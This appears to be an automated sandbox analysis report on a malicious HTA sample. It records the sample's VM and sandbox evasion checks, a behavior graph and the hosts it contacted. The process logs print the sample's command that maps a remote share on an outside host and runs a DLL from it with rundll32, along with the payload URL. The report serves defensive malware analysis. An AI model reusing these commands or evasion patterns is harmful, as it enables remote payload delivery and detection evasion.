Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 407 Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Window / User API: threadDelayed 1782 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\net.exe TID: 8172 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 8040 Thread sleep count: 1782 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 8040 Thread sleep time: -178200s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: mshta.exe, 00000000.00000003.1358050857.0000000005EB0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: yc|qemu|kvm|xeon|broad
Source: mshta.exe, 00000000.00000003.1353347251.0000000006BBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353289336.0000000006BBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1363655021.0000000006BBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UHgfSBsTLF9XR35sZbOWDpAkNsuyK9VsNeI6aZMW4BLwKDZpepc5Q1LV7HqQYLJj25J2UCGtz4YQj34GvPiIPvt0v8JCC0EmUcd
Source: mshta.exe, 00000000.00000003.1358358350.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: r=RegExp('epyc|qemu|kvm|xeon|broad','i');
Source: mshta.exe, 00000000.00000003.1358358350.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: epyc|qemu|kvm|xeon|broad
Source: mshta.exe, 00000000.00000003.1357251887.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359012847.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359012847.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359779008.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1357251887.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359779008.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1494593782.000000000073C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1384360474.000000000073C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1494593782.00000000006F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000000.00000003.1353152128.0000000006B3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s5bSCqsMiFLyGhbWw4mxZmzBUDzXRP6Kr5Wbo5cdff3E5XLxnPOCFsDssy5imSstR6CioDn2Q1hKbZZwsZrPEf9gQrks8s4TukGQcbCSp2kP4M8VmcIH6HJ1Qvm2S5uJRnsYtUcPny5A2WGlEWnTtuv8sm9yGqSJkp0qDjh3aajoY86ntD1KmQzyg5mKLmgYhrIVJPwFM3jRj3mYgImx2jHj1tLyG19yTqH1SUeYuUYhMTOtYmWQcgpXLiq2eU0nIDakPgJSJYqSz75xuJ3
Source: mshta.exe, 00000000.00000003.1350769128.0000000007237000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1356764896.0000000006719000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352893472.0000000006A32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352235865.0000000006784000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352475996.0000000006833000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352811682.000000000697C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353064285.0000000006AB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353008981.0000000006AB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352757029.000000000693B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1348355677.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353347251.0000000006B3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bcZ59EdWPRbWEoLgpVdNdC4WSaMuMpNvkr1eg04Y00SesS9IAVuuPQpls2adNYMefTpervR11oDGywsG6jA54Uel48rSv34vW3Lq4EwxFh3P0QvWJYAk9IyuiV7pCCj1QJezNTFkMKakrl1AMgF5t9AgKUDBlIpCOftpFBN3N6aOcy56UHgfSBsTLF9XR35sZbOWDpAkNsuyK9VsNeI6aZMW4BLwKDZpepc5Q1LV7HqQYLJj25J2UCGtz4YQj34GvPiIPvt0v8JCC0EmUcd
Source: mshta.exe, 00000000.00000003.1353347251.0000000006BBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353289336.0000000006BBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1363655021.0000000006BBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UHgfSBsTLF9XR35sZbOWDpAkNsuyK9VsNeI6aZMW4BLwKDZpepc5Q1LV7HqQYLJj25J2UCGtz4YQj34GvPiIPvt0v8JCC0EmUcd
Source: mshta.exe, 00000000.00000003.1357251887.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359012847.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359779008.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: mshta.exe, 00000000.00000003.1358050857.0000000005EA5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: epyc|qemu|kvm|xeon|broadNatK($&
Source: mshta.exe, 00000000.00000003.1350769128.0000000007237000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352893472.0000000006A32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352235865.0000000006784000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352475996.0000000006833000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353064285.0000000006AB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353008981.0000000006AB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352757029.000000000693B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1348355677.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352893472.00000000069F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353347251.0000000006B3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1347584755.0000000006DF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fW9P1R70625bzjxKq6t5RdjjyM33YZsVAjowsnPb3FLpu77zvliz4tUN5VQiw6FVxTYkN1hARqCfAfApuMUahRvLoI57zALW5iKeCqfsK1Rgw3pt61mFHpcV0drIp7T235u4Mjmji3MymFVgl85Z8zqB5j9sv50cnk9HQnQitojS2nGG0BABbk3xnfGiXpmQEmU4s2LQRX4QFKeTna3Az5kTXq5NconRNOzK2QsyjQqRMSGSto6XuKGIDhXMvcYhM0zOmsUagmlXg7PdkXP
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c net use V: \\6t.lc@ssl\nz && C:\Windows\system32\rundll32 V:\mw\37.dll,%time% Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 200 && net use V: /d /y Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: \\6t.lc@ssl\nz Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32 V:\mw\37.dll, 7:02:13.25 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 200 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: /d /y Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Gathers information about network shares
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c net use V: \\6t.lc@ssl\nz && C:\Windows\system32\rundll32 V:\mw\37.dll,%time%
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 200 && net use V: /d /y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: \\6t.lc@ssl\nz
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: /d /y
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c net use V: \\6t.lc@ssl\nz && C:\Windows\system32\rundll32 V:\mw\37.dll,%time% Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 200 && net use V: /d /y Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: \\6t.lc@ssl\nz Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: /d /y Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579287 Sample: jqplot.hta Startdate: 21/12/2024 Architecture: WINDOWS Score: 56 31 6t.lc 2->31 33 969d6a2f.respectfulnesses.makeup 2->33 41 Sigma detected: Suspicious MSHTA Child Process 2->41 43 AI detected suspicious sample 2->43 8 mshta.exe 13 2->8         started        signatures3 process4 dnsIp5 37 969d6a2f.respectfulnesses.makeup 104.21.90.205, 443, 49699 CLOUDFLARENETUS United States 8->37 45 Gathers information about network shares 8->45 12 cmd.exe 1 8->12         started        15 cmd.exe 1 8->15         started        signatures6 process7 signatures8 47 Gathers information about network shares 12->47 17 rundll32.exe 12->17         started        20 net.exe 7 12->20         started        23 conhost.exe 12->23         started        25 conhost.exe 15->25         started        27 net.exe 1 15->27         started        29 timeout.exe 1 15->29         started        process9 dnsIp10 39 Tries to detect sandboxes / dynamic malware analysis system (file name check) 17->39 35 6t.lc 147.45.112.248, 443, 49703, 49723 FREE-NET-ASFREEnetEU Russian Federation 20->35 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
147.45.112.248
 6t.lc Russian Federation
2895 FREE-NET-ASFREEnetEU true
104.21.90.205
 969d6a2f.respectfulnesses.makeup United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
969d6a2f.respectfulnesses.makeup 104.21.90.205 true
6t.lc 147.45.112.248 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://969d6a2f.respectfulnesses.makeup/2l5hd077he70d false
    		unknown
    https://6t.lc/nz/mw/37.dll false
      		unknown